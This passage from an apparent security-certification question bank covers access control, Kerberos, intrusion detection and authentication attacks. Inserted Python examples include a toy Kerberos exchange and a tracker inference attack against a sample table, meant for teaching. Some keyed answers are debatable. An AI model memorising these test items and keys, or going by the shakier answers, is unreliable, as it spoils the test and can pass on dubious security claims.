C. Salting is the inclusion of a random value in the password hashing process that greatly decreases the likelihood of identical passwords returning the same hash. If two users choose the same password, salting can make it highly unlikely that their hashes are the same. Larger salts effectively make the use of rainbow tables infeasible. Stretching involves hashing each password and its salt thousands of times. This makes the creation of the rainbow tables correspondingly more time-consuming, while having little effect on the amount of effort needed by the organization’s systems to verify password authentication attempts. Keyspace is the large number of possible key values (keys) created by the encryption algorithm to use when transforming the message. Passphrase is a sequence of characters transformed by a password system into a virtual password. Entropy is a measure of the amount of uncertainty that an attacker faces to determine the value of a secret.
650
Passwords can be stored safely in which of the following places? a. Initialization file b. Script file c. Password file d. Batch file
C. Passwords should not be included in initialization files, script files, or batch files due to possible compromise. Instead, they should be stored in a password file, preferably encrypted.
651
What are the Bell-LaPadula access control model and mandatory access control policy examples of? a. Identity-based access controls (IBAC) b. Attribute-based access controls (ABAC) c. Role-based access controls (RBAC) d. Rule-based access controls (RuBAC)
D. Rule-based access control (RuBAC) is based on specific rules relating to the nature of the subject and object. A RuBAC decision requires authorization information and restriction information to be compared before any access is granted. Both the Bell-LaPadula access control model and the mandatory access control policy deal with rules. The other three choices do not deal with rules.
652
Which of the following security solutions for access control is simple to use and easy to administer? a. Passwords b. Cryptographic tokens c. Hardware keys d. Encrypted data files
C. Hardware keys are devices that do not require a complicated process of administering user rights and access privileges. They are simple keys, similar to door keys, that can be plugged into the personal computer before a person can successfully log on to access controlled data files and programs. Each user gets a set of keys for his personal use. Hardware keys are simple to use and easy to administer. Passwords is an incorrect answer because they do require some amount of security administrative work such as setting up the account and helping users when they forget passwords. Passwords are simple to use but hard to administer. Cryptographic tokens is an incorrect answer because they do require some amount of security administrative work. Tokens need to be assigned, programmed, tracked, and disposed of. Encrypted data files is an incorrect answer because they do require some amount of security administrative work. Encryption keys need to be assigned to the owners for encryption and decryption purposes.
653
Cryptographic authentication systems must specify how the cryptographic algorithms will be used. Which of the following authentication systems would reduce the risk of impersonation in an environment of networked computer systems? a. Kerberos-based authentication system b. Password-based authentication system c. Memory token-based authentication system d. Smart token-based authentication system
A. The primary goal of Kerberos is to prevent system users from claiming the identity of other users in a distributed computing environment. The Kerberos authentication system is based on secret key cryptography. The Kerberos protocol provides strong authentication of users and host computer systems. Further, Kerberos uses a trusted third party to manage the cryptographic keying relationships, which are critical to the authentication process. System users have a significant degree of control over the workstations used to access network services, and these workstations must therefore be considered not trusted. Kerberos was developed to provide distributed network authentication services involving client/server systems. A primary threat in this type of client/server system is the possibility that one user claims the identity of another user (impersonation), thereby gaining access to system services without the proper authorization. To protect against this threat, Kerberos provides a trusted third party accessible to network entities, which supports the services required for authentication between these entities. This trusted third party is known as the Kerberos key distribution server, which shares secret cryptographic keys with each client and server within a particular realm. The Kerberos authentication model is based upon the presentation of cryptographic tickets to prove the identity of clients requesting services from a host system or server. The other three choices are incorrect because they cannot reduce the risk of impersonation. For example: (i) passwords can be shared, guessed, or captured and (ii) memory tokens and smart tokens can be lost or stolen. Also, these three choices do not use a trusted third party to strengthen controls as Kerberos does.
654
What do the weaknesses of Kerberos include? 1. Subject to dictionary attacks. 2. Works with existing security systems software. 3. Intercepting and analyzing network traffic is difficult. 4. Every network application must be modified. a. 1 and 2 b. 2 and 3 c. 1 and 4 d. 3 and 4
C. Kerberos is an authentication system whose encryption mechanisms make network traffic secure. Weaknesses of Kerberos include (i) it is subject to dictionary attacks: because the client's long-term key is derived from the user's password, an attacker who captures the initial exchange can guess passwords offline, and (ii) it requires modification of every network application's source code ("Kerberizing" the application), which is a problem with vendor-developed applications supplied without source code. Strengths of Kerberos include that it can be added to an existing security system and that it makes intercepting and analyzing network traffic difficult, because of its use of encryption.
655
Less common ways to initiate impersonation attacks on the network include the use of which of the following? a. Firewalls and account names b. Passwords and account names c. Biometric checks and physical keys d. Passwords and digital certificates
C. Impersonation attacks involving the use of physical keys and biometric checks are less likely due to the need for the network attacker to be physically near the biometric equipment. Passwords and account names are incorrect because they are the most common way to initiate impersonation attacks on the network. A firewall is a mechanism to protect IT computing sites against Internet-borne attacks. Most digital certificates are password-protected and have an encrypted file that contains identification information about its holder.
656
Which of the following security services can Kerberos best provide? a. Authentication b. Confidentiality c. Integrity d. Availability
A. Kerberos is a de facto standard for an authentication protocol, providing a robust authentication method. Kerberos was developed to enable network applications to securely identify their peers and can be used for local/remote logins, remote execution, file transfer, transparent file access (i.e., access of remote files on the network as though they were local) and for client/server requests. The Kerberos system includes a Kerberos server, applications which use Kerberos authentication, and libraries for use in developing applications which use Kerberos authentication. In addition to secure remote procedure call (Secure RPC), Kerberos prevents impersonation in a network environment and only provides authentication services. Other services such as confidentiality, integrity, and availability must be provided by other means. With Kerberos and secure RPC, passwords are not transmitted over the network in plaintext. In Kerberos two items need to prove authentication. The first is the ticket and the second is the authenticator. The ticket consists of the requested server name, the client name, the address of the client, the time the ticket was issued, the lifetime of the ticket, the session key to be used between the client and the server, and some other fields. The ticket is encrypted using the server’s secret key and thus cannot be correctly decrypted by the user. If the server can properly decrypt the ticket when the client presents it and if the client presents the authenticator encrypted using the session key contained in the ticket, the server can have confidence in the user’s identity. The authenticator contains the client name, address, current time, and some other fields. The authenticator is encrypted by the client using the session key shared with the server. The authenticator provides a time-validation for the credential. 
If a user possesses both the proper credential and the authenticator encrypted with the correct session key and presents these items within the lifetime of the ticket, then the user’s identity can be authenticated. Confidentiality is incorrect because it ensures that data is disclosed to only authorized subjects. Integrity is incorrect because it is the property that an object is changed only in a specified and authorized manner. Availability is incorrect because it is the property that a given resource will be usable during a given time period
657
What is the major advantage of a single sign-on? a. It reduces management work. b. It is a convenience for the end user. c. It authenticates a user once. d. It provides a centralized administration.
B. Under single sign-on (SSO), a user authenticates once to gain access to multiple applications that have been previously defined in the security system. SSO is convenient for the end user because there are fewer credentials and login prompts to manage than with multiple sign-on, but it is also risky: the one credential now protects everything it unlocks. Multiple sign-on systems, by contrast, have many points of failure and are inconvenient for the end user because of the many credentials to manage.
658
Kerberos can prevent which one of the following attacks? a. Tunneling attack b. Playback attack c. Destructive attack d. Process attack
B. In a playback (replay) attack, messages captured from a legitimate exchange are later sent again to the recipient as if they were fresh. (A reflection attack is a related variant in which a challenge is sent back to its originator.) Kerberos puts the current time of day in the authenticator that accompanies each request, so a server can reject a request whose timestamp falls outside its clock-skew window or that repeats one it has already accepted; this prevents an eavesdropper from intercepting the request for service and retransmitting it from the same host at a later time. A tunneling attack attempts to exploit a weakness in a system that exists at a level of abstraction lower than that used by the developer to design the system. For example, an attacker might discover a way to modify the microcode of a processor used when encrypting some data, rather than attempting to break the system’s encryption algorithm. Destructive attacks damage information in a fashion that denies service. These attacks can be prevented by restricting access to critical data files and protecting them from unauthorized users. In process attacks, one user makes a computer unusable for others that use the computer at the same time. These attacks are applicable to shared computers.
659
From an access control point of view, which of the following are examples of history-based access control policies? 1. Role-based access control 2. Workflow policy 3. Rule-based access control 4. Chinese Wall policy a. 1 and 2 b. 1 and 3 c. 2 and 4 d. 3 and 4
C. History-based access control policies are defined in terms of subjects and events where the events of the system are specified as the object access operations associated with activity at a particular security level. This assumes that the security policy is defined in terms of the sequence of events over time, and that the security policy decides which events of the system are permitted to ensure that information does not flow in an unauthorized manner. History-based access control policies are not based on standard access control mechanism but based on practical applications. In the history-based access control policies, previous access events are used as one of the decision factors for the next access authorization. The workflow and the Chinese Wall policies are examples of history-based access control policies.
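The Chinese Wall policy named in the answer, as an added worked example (not code from the original flashcards). The classes, company names and conflict-of-interest classes below are constructed sample data; the policy rules implemented are the Brewer-Nash read rule and write rule, in which every decision depends on what the subject has already read:

```python
from __future__ import annotations

from dataclasses import dataclass
from typing import Dict, Set


@dataclass(frozen=True)
class Obj:
    """A protected object: it belongs to one company dataset, and every
    company dataset sits in exactly one conflict-of-interest (COI) class."""
    name: str
    company: str
    coi_class: str
    sanitized: bool = False   # public information sits outside the wall


class ChineseWall:
    """Brewer-Nash policy: the decision depends on the subject's access history."""

    def __init__(self) -> None:
        self.history: Dict[str, Set[Obj]] = {}

    def _seen(self, subject: str) -> Set[Obj]:
        return self.history.setdefault(subject, set())

    def can_read(self, subject: str, obj: Obj) -> bool:
        """Read rule: allowed unless the subject has already read an unsanitized
        object of a *different* company in the *same* COI class."""
        if obj.sanitized:
            return True
        for seen in self._seen(subject):
            if (not seen.sanitized and seen.coi_class == obj.coi_class
                    and seen.company != obj.company):
                return False
        return True

    def read(self, subject: str, obj: Obj) -> bool:
        """Perform the access and, if granted, record it: the wall moves with history."""
        if not self.can_read(subject, obj):
            return False
        self._seen(subject).add(obj)
        return True

    def can_write(self, subject: str, obj: Obj) -> bool:
        """Write rule: allowed only if the subject could read obj and holds no
        unsanitized information from any other company dataset, so nothing can
        be copied across the wall indirectly."""
        if not self.can_read(subject, obj):
            return False
        for seen in self._seen(subject):
            if not seen.sanitized and seen.company != obj.company:
                return False
        return True


# Constructed sample data: two competing banks and an unrelated oil company.
BANK_A = Obj("BankA-accounts", "BankA", "banking")
BANK_B = Obj("BankB-accounts", "BankB", "banking")
BANK_B_PUBLIC = Obj("BankB-annual-report", "BankB", "banking", sanitized=True)
OIL_X = Obj("OilX-forecast", "OilX", "oil")


def demo() -> Dict[str, bool]:
    wall = ChineseWall()
    out = {}
    out["read BankA"] = wall.read("analyst", BANK_A)            # first access: free choice
    out["read OilX"] = wall.read("analyst", OIL_X)              # different COI class: allowed
    out["read BankB"] = wall.read("analyst", BANK_B)            # competitor of BankA: denied
    out["read BankB public"] = wall.read("analyst", BANK_B_PUBLIC)  # sanitized: allowed
    out["read BankA again"] = wall.read("analyst", BANK_A)      # same dataset: still allowed
    # The analyst holds OilX data, so writing into BankA could leak it across datasets.
    out["write BankA"] = wall.can_write("analyst", BANK_A)
    # A subject that has only ever read BankA may write to BankA.
    wall.read("auditor", BANK_A)
    out["auditor write BankA"] = wall.can_write("auditor", BANK_A)
    return out


if __name__ == "__main__":
    for decision, ok in demo().items():
        print(f"{decision:22s} -> {'allowed' if ok else 'denied'}")
```

The same request ("analyst reads BankB") is allowed before the analyst has read BankA and denied afterwards, which is what makes the policy history-based rather than a fixed matrix of subjects and objects.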
660
Which of the following is most commonly used in the implementation of an access control matrix? a. Discretionary access control b. Mandatory access control c. Access control list d. Logical access control
C. The access control list (ACL) is the most useful and flexible type of implementation of an access control matrix. The ACL permits any given user to be allowed or disallowed access to any object. The columns of an ACL show a list of users attached to protected objects. One can associate access rights for individuals and resources directly with each object. The other three choices require extensive administrative work and are useful but not that flexible.
661
What is Kerberos? a. Access-oriented protection system b. Ticket-oriented protection system c. List-oriented protection system d. Lock-and-key-oriented protection system
B. Kerberos was developed to enable network applications to securely identify their peers. It uses a ticket, which identifies the client, and an authenticator that serves to validate the use of that ticket and prevent an intruder from replaying the same ticket to the server in a future session. A ticket is valid only for a given time interval. When the interval ends, the ticket expires, and any later authentication exchanges require a new ticket. An access-oriented protection system can be based on hardware or software or a combination of both to prevent and detect unauthorized access and to permit authorized access. In list-oriented protection systems, each protected object has a list of all subjects authorized to access it. A lock-and-key-oriented protection system involves matching a key or password with a specific access requirement. The other three choices do not provide a strong authentication protection, as does the Kerberos.
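The ticket-and-authenticator exchange described in answers 656, 658 and 661 (ticket sealed under the server's key, authenticator sealed under the session key, timestamp checked against clock skew, ticket lifetime enforced), as an added simulation that is not code from the original flashcards or from any Kerberos implementation. It assumes a toy authenticated-encryption routine built from HMAC-SHA256 so that it runs with the standard library only; real Kerberos uses AES-based encryption types. The realm, principal names, addresses, the 300-second skew and the fixed clock values are constructed for the example:

```python
import hashlib
import hmac
import json
import os
from typing import Dict, Optional, Tuple

# Toy authenticated encryption from HMAC-SHA256 (NOT a real cipher). It only
# models "sealed under key K": without K the contents can be neither read nor altered.
def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    out = b""
    for counter in range((n + 31) // 32):
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
    return out[:n]

def seal(key: bytes, obj: dict) -> bytes:
    nonce = os.urandom(12)
    pt = json.dumps(obj, sort_keys=True).encode()
    ct = bytes(a ^ b for a, b in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()

def unseal(key: bytes, blob: bytes) -> Optional[dict]:
    nonce, ct, tag = blob[:12], blob[12:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, nonce + ct, hashlib.sha256).digest(), tag):
        return None  # wrong key or tampered ciphertext
    return json.loads(bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct)))))

CLOCK_SKEW = 300  # seconds of tolerated clock difference (assumed value)

class KDC:
    """Trusted third party sharing a long-term secret key with every principal."""
    def __init__(self, keys: Dict[str, bytes]) -> None:
        self.keys = keys

    def issue(self, client: str, server: str, addr: str, now: int,
              lifetime: int = 8 * 3600) -> Tuple[bytes, bytes]:
        session_key = os.urandom(32)
        ticket = seal(self.keys[server], {"client": client, "server": server, "addr": addr,
                      "issued": now, "lifetime": lifetime, "session_key": session_key.hex()})
        # The same session key goes back to the client sealed under the client's key.
        for_client = seal(self.keys[client], {"server": server, "session_key": session_key.hex()})
        return ticket, for_client

class Client:
    def __init__(self, name: str, key: bytes, addr: str) -> None:
        self.name, self.key, self.addr = name, key, addr
        self.ticket, self.session_key = b"", b""

    def get_ticket(self, kdc: KDC, server: str, now: int) -> None:
        self.ticket, for_client = kdc.issue(self.name, server, self.addr, now)
        self.session_key = bytes.fromhex(unseal(self.key, for_client)["session_key"])

    def authenticator(self, now: int) -> bytes:
        """Built fresh per request; proves possession of the session key at time `now`."""
        return seal(self.session_key, {"client": self.name, "addr": self.addr, "time": now})

class Server:
    def __init__(self, name: str, key: bytes) -> None:
        self.name, self.key = name, key
        self.replay_cache = set()  # (client, authenticator time) pairs already accepted

    def authenticate(self, ticket: bytes, authenticator: bytes, now: int) -> Tuple[bool, str]:
        t = unseal(self.key, ticket)
        if t is None or t["server"] != self.name:
            return False, "ticket not sealed under this server's key"
        if now > t["issued"] + t["lifetime"]:
            return False, "ticket expired"
        a = unseal(bytes.fromhex(t["session_key"]), authenticator)
        if a is None:
            return False, "authenticator not sealed with the ticket's session key"
        if a["client"] != t["client"] or a["addr"] != t["addr"]:
            return False, "authenticator does not match ticket"
        if abs(now - a["time"]) > CLOCK_SKEW:
            return False, "authenticator timestamp outside clock skew"
        if (a["client"], a["time"]) in self.replay_cache:
            return False, "replay detected"
        self.replay_cache.add((a["client"], a["time"]))
        return True, f"authenticated {a['client']} from {a['addr']}"

def run_exchange() -> Dict[str, bool]:
    """Constructed realm (one client, one server, a KDC) driven by a fixed clock."""
    keys = {"alice": os.urandom(32), "fileserver": os.urandom(32)}
    kdc, server = KDC(keys), Server("fileserver", keys["fileserver"])
    alice = Client("alice", keys["alice"], "10.0.0.7")
    t0 = 1_700_000_000
    alice.get_ticket(kdc, "fileserver", t0)
    auth = alice.authenticator(t0 + 5)
    mallory = Client("mallory", os.urandom(32), "10.0.0.9")  # shares no key with the KDC
    mallory.session_key = os.urandom(32)
    return {
        "first": server.authenticate(alice.ticket, auth, t0 + 6)[0],
        "replay": server.authenticate(alice.ticket, auth, t0 + 60)[0],        # same authenticator again
        "stale": server.authenticate(alice.ticket, alice.authenticator(t0 + 5), t0 + 5000)[0],
        "fresh": server.authenticate(alice.ticket, alice.authenticator(t0 + 5000), t0 + 5000)[0],
        "expired": server.authenticate(alice.ticket, alice.authenticator(t0 + 32400), t0 + 32400)[0],
        "forged": server.authenticate(alice.ticket, mallory.authenticator(t0 + 10), t0 + 10)[0],
    }

if __name__ == "__main__":
    print(run_exchange())
```

Note that the server never learns Alice's password or long-term key: it trusts the KDC's seal on the ticket and Alice's proof of the session key in the authenticator, and a captured ticket is useless to Mallory because she cannot produce an authenticator under the session key.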
662
For intrusion detection and prevention system capabilities using anomaly-based detection, administrators should check which of the following to determine whether they need to be adjusted to compensate for changes in the system and changes in threats? a. Whitelists b. Thresholds c. Program code viewing d. Blacklists
B. Administrators should check the intrusion detection and prevention system (IDPS) thresholds and alert settings to determine whether they need to be adjusted periodically to compensate for changes in the system environment and changes in threats. The other three choices are incorrect because the anomaly-based detection does not use whitelists, blacklists, and program code viewing.
663
Intrusion detection systems cannot do which of the following? a. Report alterations to data files b. Trace user activity c. Compensate for weak authentication d. Interpret system logs
C. An intrusion detection system (IDS) cannot act as a “silver bullet,” compensating for weak identification and authentication mechanisms, weaknesses in network protocols, or lack of a security policy. IDS can do the other three choices, such as recognizing and reporting alterations to data files, tracing user activity from the point of entry to the point of exit or impact, and interpreting the mass of information contained in operating system logs and audit trail logs.
664
Intrusion detection systems can do which of the following? a. Analyze all the traffic on a busy network b. Deal with problems involving packet-level attacks c. Recognize a known type of attack d. Deal with high-speed asynchronous transfer mode networks
C. Intrusion detection systems (IDS) can recognize when a known type of attack is perpetrated on a system. However, IDS cannot do the following: (i) analyze all the traffic on a busy network, (ii) compensate for receiving faulty information from system sources, (iii) always deal with problems involving packet-level attacks (e.g., an intruder using fabricated packets that elude detection to launch an attack or multiple packets to jam the IDS itself), and (iv) deal with high-speed asynchronous transfer mode networks that use packet fragmentation to optimize bandwidth.
665
What is the most risky part of the primary nature of access control? a. Configured or misconfigured b. Enabled or disabled c. Privileged or unprivileged d. Encrypted or decrypted
B. Access control software can be enabled or disabled, meaning security function can be turned on or off. When disabled, the logging function does not work. The other three choices are somewhat risky but not as much as enabled or disabled.
666
Intrusion detection refers to the process of identifying attempts to penetrate a computer system and gain unauthorized access. Which of the following assists in intrusion detection? a. Audit records b. Access control lists c. Security clearances d. Host-based authentication
A. If audit records showing trails have been designed and implemented to record appropriate information, they can assist in intrusion detection. Usually, audit records contain pertinent data (e.g., date, time, status of an action, user IDs, and event ID), which can help in intrusion detection. Access control lists refer to a register of users who have been given permission to use a particular system resource and the types of access they have been permitted. Security clearances are associated with a subject (e.g., person and program) to access an object (e.g., files, libraries, directories, and devices). Host-based authentication grants access based upon the identity of the host originating the request, instead of the identity of the user making the request. The other three choices have no facilities to record access activity and therefore cannot assist in intrusion detection.
667
Which of the following is the technique used in anomaly detection in intrusion detection systems where user and system behaviors are expressed in terms of counts? a. Parametric statistics b. Threshold detection measures c. Rule-based measures d. Nonparametric statistics
B. Anomaly detectors identify abnormal, unusual behavior (anomalies) on a host or network. In threshold detection measures, certain attributes of user and system behavior are expressed in terms of counts, with some level established as permissible. Such behavior attributes can include the number of files accessed by a user in a given period of time. Statistical measures include parametric and nonparametric. In parametric measures the distribution of the profiled attributes is assumed to fit a particular pattern. In the nonparametric measures the distribution of the profiled attributes is “learned” from a set of historical data values, observed over time. Rule-based measures are similar to nonparametric statistical measures in that observed data defines acceptable usage patterns but differs in that those patterns are specified as rules, not numeric quantities.
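The three anomaly-detection measures the answer contrasts, run over sample audit lines, as an added example that is not code from the original flashcards. The log lines, the per-user history and the ten-minute window are constructed; the cutoffs (mean + 3 standard deviations for the parametric case, the 95th percentile for the nonparametric case) are assumed choices for illustration:

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime, timezone
from typing import Dict, List

# Constructed sample audit log: one event per line, all in one ten-minute window.
SAMPLE_LOG = """\
2024-05-01T09:00:12 user=alice action=login
2024-05-01T09:01:03 user=alice action=file_open path=/srv/docs/plan.docx
2024-05-01T09:01:40 user=alice action=file_open path=/srv/docs/budget.xlsx
2024-05-01T09:02:11 user=alice action=file_open path=/srv/docs/notes.txt
2024-05-01T09:02:30 user=bob action=file_open path=/srv/hr/a.pdf
2024-05-01T09:02:31 user=bob action=file_open path=/srv/hr/b.pdf
2024-05-01T09:02:32 user=bob action=file_open path=/srv/hr/c.pdf
2024-05-01T09:02:33 user=bob action=file_open path=/srv/hr/d.pdf
2024-05-01T09:02:34 user=bob action=file_open path=/srv/hr/e.pdf
""" + "".join(f"2024-05-01T09:03:{s:02d} user=mallory action=file_open path=/srv/finance/{s}.csv\n"
              for s in range(12))

# Constructed history: file_open counts per ten-minute window observed for
# ordinary users on earlier days, used to learn a threshold.
HISTORY = [2, 3, 1, 4, 2, 3, 5, 2, 3, 4]

LINE = re.compile(r"^(?P<ts>\S+) user=(?P<user>\w+) action=(?P<action>\w+)")


def count_events(log: str, action: str, window_minutes: int = 10) -> Dict[str, int]:
    """Threshold-detection input: the largest number of `action` events any
    user generated within a single fixed window."""
    per_window: Dict[tuple, int] = defaultdict(int)
    for line in log.splitlines():
        m = LINE.match(line)
        if not m or m["action"] != action:
            continue
        ts = datetime.fromisoformat(m["ts"]).replace(tzinfo=timezone.utc)
        per_window[(m["user"], int(ts.timestamp()) // (window_minutes * 60))] += 1
    worst: Dict[str, int] = defaultdict(int)
    for (user, _), n in per_window.items():
        worst[user] = max(worst[user], n)
    return dict(worst)


def threshold_alerts(counts: Dict[str, int], threshold: float) -> List[str]:
    """Threshold measure: flag every user whose count exceeds the permitted level."""
    return sorted(user for user, n in counts.items() if n > threshold)


def parametric_threshold(history: List[int], k: float = 3.0) -> float:
    """Parametric statistic: assumes counts are roughly normal; cutoff = mean + k*stdev."""
    return statistics.mean(history) + k * statistics.stdev(history)


def nonparametric_threshold(history: List[int], percentile: float = 0.95) -> float:
    """Nonparametric statistic: no distribution assumed; the cutoff is learned
    from the observed values themselves (here the 95th percentile)."""
    ordered = sorted(history)
    return ordered[int(percentile * (len(ordered) - 1))]


if __name__ == "__main__":
    counts = count_events(SAMPLE_LOG, "file_open")
    print("file_open per user:", counts)
    print("fixed threshold 10:", threshold_alerts(counts, 10))
    p, np_ = parametric_threshold(HISTORY), nonparametric_threshold(HISTORY)
    print(f"parametric cutoff {p:.2f}:", threshold_alerts(counts, p))
    print(f"nonparametric cutoff {np_}:", threshold_alerts(counts, np_))
```

On this data the fixed threshold and the parametric cutoff flag only mallory (12 opens), while the nonparametric cutoff learned from history (4) also flags bob (5 opens); which of those is a true positive is exactly the tuning question the previous answer on IDPS thresholds raises.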
668
Which of the following is best to replace the use of personal identification numbers (PINs) in the world of automated teller machines (ATMs)? a. Iris-detection technology b. Voice technology c. Hand technology d. Fingerprint technology
A. An ATM customer can stand within three feet of a camera that automatically locates and scans the iris of the eye. The scanned iris pattern is encoded as a template and compared against the template previously stored in the bank’s file. Iris recognition is far superior in accuracy to voice, face, hand, and fingerprint identification systems. Iris technology does not require a PIN.
669
Which of the following is true about biometrics? a. Least expensive and least secure b. Most expensive and least secure c. Most expensive and most secure d. Least expensive and most secure
C. Biometrics tends to be the most expensive and most secure. In general, passwords are the least expensive authentication technique and generally the least secure. Memory tokens are less expensive than smart tokens but have less functionality. Smart tokens with a human interface do not require reading equipment and are more convenient to use.
670
Which of the following is preferable for environments at high risk of identity spoofing? a. Digital signature b. One-time passwords c. Digital certificate d. Mutual authentication
D. If a one-way method is used to authenticate the initiator (typically a road warrior) to the responder (typically an IPsec gateway), a digital signature is used to authenticate the responder to the initiator. One-way authentication, such as one-time passwords or digital certificates on tokens is well suited for road warrior usage, whereas mutual authentication is preferable for environments at high risk of identity spoofing, such as wireless networks.
671
Which of the following is not a substitute for logging out of the information system? a. Previous logon notification b. Concurrent session control c. Session lock
C. Both users and the system can initiate a session lock. However, a session lock is not a substitute for logging out of the information system: a lock only suspends a session that remains open (for example, while the user steps away during the day), whereas logging out ends the session, which is what should happen at the end of the workday. Previous logon notification occurs at the time of login. Concurrent session control deals with either allowing or not allowing multiple sessions at the same time. Session termination can occur when there is a disconnection of the telecommunications link or other network operational problems.
672
Identity thieves can get personal information through which of the following means? 1. Dumpster diving 2. Skimming 3. Phishing 4. Pretexting a. 1 only b. 3 only c. 1 and 3 d. 1, 2, 3, and 4
D. Identity thieves get personal information by stealing records or information while they are on the job, bribing an employee who has access to these records, hacking electronic records, and conning information out of employees. Sources of personal information include the following: Dumpster diving, which includes rummaging through personal trash, a business’ trash, or public trash dumps. Skimming includes stealing credit card or debit card numbers by capturing the information in a data storage device. Phishing and pretexting deal with stealing information through e-mail or phone by posing as legitimate companies and claiming that you have a problem with your account. This practice is known as phishing online or pretexting (social engineering) by phone respectively.
673
Which of the following application-related authentication types is risky? a. External authentication b. Proprietary authentication c. Pass-through authentication d. Host/user authentication
C. Pass-through authentication refers to passing operating system credentials (e.g., username and password) unencrypted from the operating system to the application system. This is risky due to unencrypted credentials. Note that pass-through authentications can be encrypted or unencrypted. External authentication is incorrect because it uses a directory server, which is not risky. Proprietary authentication is incorrect because username and passwords are part of the application, not the operating system. This is less risky. Host/user authentication is incorrect because it is performed within a controlled environment (e.g., managed workstations and servers within an organization). Some applications may rely on previous authentication performed by the operating system. This is less risky.
674
Inference attacks are based on which of the following? a. Hardware and software b. Firmware and freeware c. Data and information d. Middleware and courseware
C. An inference attack is where a user or an intruder can deduce information to which he had no privilege from information to which he has privilege.
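An inference attack carried out against a statistical query interface, as an added worked example (not code from the original flashcards). The personnel table, the minimum query-set size of 3, and the overlap limit of 2 are constructed for the example; `StatDB`, `is_refused` and `infer_salary` are hypothetical helpers written for it. The user is only privileged to see department totals, yet two permitted totals combine to reveal one person's salary (a "tracker" attack); the overlap control shows one way to close that channel:

```python
import sqlite3
from typing import List, Optional, Sequence, Set

# Constructed personnel table. Individual salaries are sensitive; department
# aggregates are meant to be available to anyone.
ROWS = [
    ("alice", "eng", 120000), ("bob", "eng", 95000), ("carol", "eng", 105000),
    ("dave", "eng", 99000), ("erin", "ops", 80000), ("frank", "ops", 82000),
    ("grace", "ops", 78000),
]


class StatDB:
    """A statistical interface that answers only aggregate queries.

    min_set: refuse a query whose query set holds fewer than this many rows.
    max_overlap: if set, also refuse a query whose set shares more than this
    many rows with any previously answered query (overlap control).
    """

    def __init__(self, min_set: int = 3, max_overlap: Optional[int] = None) -> None:
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute(
            "CREATE TABLE staff (id INTEGER PRIMARY KEY, name TEXT, dept TEXT, salary INTEGER)")
        self.conn.executemany("INSERT INTO staff (name, dept, salary) VALUES (?, ?, ?)", ROWS)
        self.min_set, self.max_overlap = min_set, max_overlap
        self.answered: List[Set[int]] = []

    def sum_salary(self, where: str, params: Sequence = ()) -> int:
        # `where` is the selection language this toy interface exposes to its
        # users; the values themselves are always bound as parameters.
        ids = {row[0] for row in self.conn.execute(f"SELECT id FROM staff WHERE {where}", params)}
        if len(ids) < self.min_set:
            raise PermissionError("query set too small")
        if self.max_overlap is not None:
            for prev in self.answered:
                if len(prev & ids) > self.max_overlap:
                    raise PermissionError("query set overlaps an earlier query too much")
        self.answered.append(ids)
        return self.conn.execute(
            f"SELECT SUM(salary) FROM staff WHERE {where}", params).fetchone()[0]


def is_refused(db: StatDB, where: str, params: Sequence = ()) -> bool:
    try:
        db.sum_salary(where, params)
        return False
    except PermissionError:
        return True


def infer_salary(db: StatDB, target: str, dept: str) -> Optional[int]:
    """Tracker attack: two individually permitted aggregates whose difference
    is one person's value. Returns None when the interface refuses."""
    try:
        whole = db.sum_salary("dept = ?", (dept,))
        without = db.sum_salary("dept = ? AND name <> ?", (dept, target))
    except PermissionError:
        return None
    return whole - without


if __name__ == "__main__":
    db = StatDB(min_set=3)
    print("direct lookup refused:", is_refused(db, "name = ?", ("alice",)))
    print("inferred via tracker:", infer_salary(db, "alice", "eng"))
    guarded = StatDB(min_set=3, max_overlap=2)
    print("with overlap control:", infer_salary(guarded, "alice", "eng"))
```

The query-set-size check alone is not enough: each query the attacker issues is individually legitimate, and the privileged fact falls out of their difference. Overlap control, query auditing, or adding noise to the answers are the usual responses.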
675
Out-of-band attacks against electronic authentication protocols include which of the following? 1. Password guessing attack 2. Replay attack 3. Verifier impersonation attack 4. Man-in-the-middle attack a. 1 only b. 3 only c. 1 and 2 d. 3 and 4
D. In an out-of-band attack, the attack is against an authentication protocol run in which the attacker assumes the role of a subscriber with a genuine verifier or relying party. The attacker obtains secrets and sensitive information (such as passwords, account numbers, and amounts) at the point where the subscriber manually enters them, for example into a one-time password device or as a confirmation code returned to the verifier or relying party. In an out-of-band attack, the attacker alters the authentication protocol channel through session hijacking, verifier impersonation, or man-in-the-middle (MitM) attacks. In a verifier impersonation attack, the attacker impersonates the verifier and induces the claimant to reveal his secret token. The MitM attack is an attack on the authentication protocol run in which the attacker positions himself between the claimant and verifier so that he can intercept and alter data traveling between them. In a password guessing attack, an impostor attempts to guess a password in repeated logon trials and succeeds when he can log onto a system. In a replay attack, an attacker records and replays some part of a previous good protocol run to the verifier. Both password guessing and replay attacks are examples of in-band attacks. In an in-band attack, the attack is against an authentication protocol where the attacker assumes the role of a claimant with a genuine verifier or actively alters the authentication channel. The goal of the attack is to gain authenticated access or learn authentication secrets.
676
Which of the following information security control families requires a cross-cutting approach? a. Access control b. Audit and accountability c. Awareness and training d. Configuration management
A. Access control requires a cross-cutting approach because it is related to access control, incident response, audit and accountability, and configuration management control families (areas). Cross-cutting means a control in one area affects the controls in other-related areas. The other three choices require a control-specific approach.
677
Confidentiality controls include which of the following? a. Cryptography b. Passwords c. Tokens d. Biometrics
A. Cryptography, which is a part of technical control, ensures the confidentiality goal. The other three choices are part of user identification and authentication controls, which are also a part of technical control.
678
Which of the following is not an example of authorization and access controls? a. Logical access controls b. Role-based access controls c. Reconstruction of transactions d. System privileges
C. Reconstruction of transactions is a part of audit trail mechanisms. The other three choices are a part of authorization and access controls.
679
Which of the following is not an example of access control policy? a. Performance-based policy b. Identity-based policy c. Role-based policy d. Rule-based policy
A. Performance-based policy is used to evaluate an employee’s performance annually or other times. The other three choices are examples of an access control policy where they control access between users and objects in the information system.
680
From security and safety viewpoints, which of the following does not support the static separation-of-duty constraints? a. Mutually exclusive roles b. Reduced chances of collusion c. Conflict-of-interest in tasks d. Implicit constraints
